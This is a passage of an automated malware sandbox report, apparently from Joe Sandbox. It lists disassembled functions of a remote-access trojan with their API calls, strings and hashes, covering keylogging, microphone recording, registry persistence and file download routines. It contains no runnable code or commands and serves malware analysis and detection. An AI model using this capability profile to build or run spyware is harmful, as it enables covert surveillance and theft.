                                                                                                • Opcode ID: b8bb5320799edddb95dab3e78f0dfafcdfd18fcc362c96300ca81892c57281c1
                                                                                                • Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
                                                                                                • Opcode Fuzzy Hash: b8bb5320799edddb95dab3e78f0dfafcdfd18fcc362c96300ca81892c57281c1
                                                                                                • Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
                                                                                                Function 00412716 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                                  • Part of subcall function 00413733: RegCloseKey.KERNELBASE(00000000), ref: 00413773
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                                • String ID: HSG$exepath$RG
                                                                                                • API String ID: 4119054056-4111122955
                                                                                                • Opcode ID: b1c708b36fa724e52661caa0efcea8b4379a0a4ada5948ef7cbd54432e038acd
                                                                                                • Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
                                                                                                • Opcode Fuzzy Hash: b1c708b36fa724e52661caa0efcea8b4379a0a4ada5948ef7cbd54432e038acd
                                                                                                • Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
                                                                                                Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                • String ID: [ $ ]
                                                                                                • API String ID: 3309952895-93608704
                                                                                                • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 3919263394-0
                                                                                                • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleOpenProcess
                                                                                                • String ID:
                                                                                                • API String ID: 39102293-0
                                                                                                • Opcode ID: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                                                                                • Instruction ID: eb9e11a2b0883253d54455b1eb0df9c10e535dd1e95c930e162dea6fb874dde8
                                                                                                • Opcode Fuzzy Hash: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                                                                                • Instruction Fuzzy Hash: 2F01F231680215ABD71066949C8AFA7B66C8B84756F0001ABFA08D2292EE74CD81466A
                                                                                                Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 2633735394-0
                                                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-0
                                                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                • String ID:
                                                                                                • API String ID: 1761009282-0
                                                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                Function 00415B25 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventTick
                                                                                                • String ID: !D@
                                                                                                • API String ID: 180926312-604454484
                                                                                                • Opcode ID: b42cbfd96513abed4ab539f3a11429bb711e2c9b86e20b1677f637f126720a84
                                                                                                • Instruction ID: a18c2cf71696728a803f4d48a8d0c2278a59ecc2ec6ff56e3a85b819d46b2ac8
                                                                                                • Opcode Fuzzy Hash: b42cbfd96513abed4ab539f3a11429bb711e2c9b86e20b1677f637f126720a84
                                                                                                • Instruction Fuzzy Hash: 4F51B6315082019AC724FB32D852AFF73A5AF94304F50483FF546671E2EF3C5945C68A
                                                                                                Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                Function 0041631F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00416330
                                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcslen$CloseCreateValue
                                                                                                • String ID: !D@$okmode
                                                                                                • API String ID: 3411444782-1942679189
                                                                                                • Opcode ID: 0711ea2bfd4c787a359980a6b3673cb5982b50ae3c2fe44c4afa186e6da94561
                                                                                                • Instruction ID: 3691d04bdc76b081f03c0e50e7d604d291fd2bc6213442c77ae478975c73e837
                                                                                                • Opcode Fuzzy Hash: 0711ea2bfd4c787a359980a6b3673cb5982b50ae3c2fe44c4afa186e6da94561
                                                                                                • Instruction Fuzzy Hash: E211A871B042011BDA187B72D822BBD2296DB84349F80483FF50AAF2E2DFBD4C51535D
                                                                                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 481472006-1507639952
                                                                                                • Opcode ID: 1ce04613839e6627e3a9c17b111698e7bd303a745310c82b78386ad318711a3a
                                                                                                • Instruction ID: b700b38ef9f928670de2390b904a97a1cb71e472754ad5b4355c5e73bb52b66b
                                                                                                • Opcode Fuzzy Hash: 1ce04613839e6627e3a9c17b111698e7bd303a745310c82b78386ad318711a3a
                                                                                                • Instruction Fuzzy Hash: E62104719007806BD710B732A80A76F7B64E755308F44057EE8491B2A2EB7D5988CBDE
                                                                                                Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadFileSleep
                                                                                                • String ID: !D@
                                                                                                • API String ID: 1931167962-604454484
                                                                                                • Opcode ID: be6e5f46a91c801139daea62cfee6fea62604350e59be30fcba7917088f11bec
                                                                                                • Instruction ID: 943aba663a6785b3e55a0e29e9dd0f60b42d3502aaa7a5a348319576c1e2766f
                                                                                                • Opcode Fuzzy Hash: be6e5f46a91c801139daea62cfee6fea62604350e59be30fcba7917088f11bec
                                                                                                • Instruction Fuzzy Hash: 9D1142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                • API String ID: 481472006-2430845779
                                                                                                • Opcode ID: 567e5faa43255f32a5b30864013efa8f17039a8847ec4d53b4e47bd37c3e1453
                                                                                                • Instruction ID: dc1ef91952a31d7701eba46fb19b130c3a81cf04c31882e55cbcd77cf5b9c3d8
                                                                                                • Opcode Fuzzy Hash: 567e5faa43255f32a5b30864013efa8f17039a8847ec4d53b4e47bd37c3e1453
                                                                                                • Instruction Fuzzy Hash: 72118E714082455AC304EB62D8519BFB3E9AB44308F50093FF88AA21E1EF3CDA45C69E
                                                                                                Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: alarm.wav$xYG
                                                                                                • API String ID: 1174141254-3120134784
                                                                                                • Opcode ID: dead4786efec343504c38dbb7bc7a316ff3e165c8f866438eec05cc0de6d3d6a
                                                                                                • Instruction ID: fba4c3df788ebc26406fa6248c5b94d62a9d66ba9cb3dc57f05af0bb44f50ff0
                                                                                                • Opcode Fuzzy Hash: dead4786efec343504c38dbb7bc7a316ff3e165c8f866438eec05cc0de6d3d6a
                                                                                                • Instruction Fuzzy Hash: 78019E7068831166CA04F77688166EE37559B80318F00847FF64A566E2EFBC9A9586CF
                                                                                                Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 1623830855-1496645233
                                                                                                • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B60,00474EF0,?,00000000,00401A15), ref: 00401849
                                                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                • String ID: hMG
                                                                                                • API String ID: 2315374483-350922481
                                                                                                • Opcode ID: 05842d2320f940dcc6a072c2e7d52a08573503918b4c9d372d2077cc61f75943
                                                                                                • Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
                                                                                                • Opcode Fuzzy Hash: 05842d2320f940dcc6a072c2e7d52a08573503918b4c9d372d2077cc61f75943
                                                                                                • Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98
                                                                                                Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocaleValid
                                                                                                • String ID: IsValidLocaleName$kKD
                                                                                                • API String ID: 1901932003-3269126172
                                                                                                • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
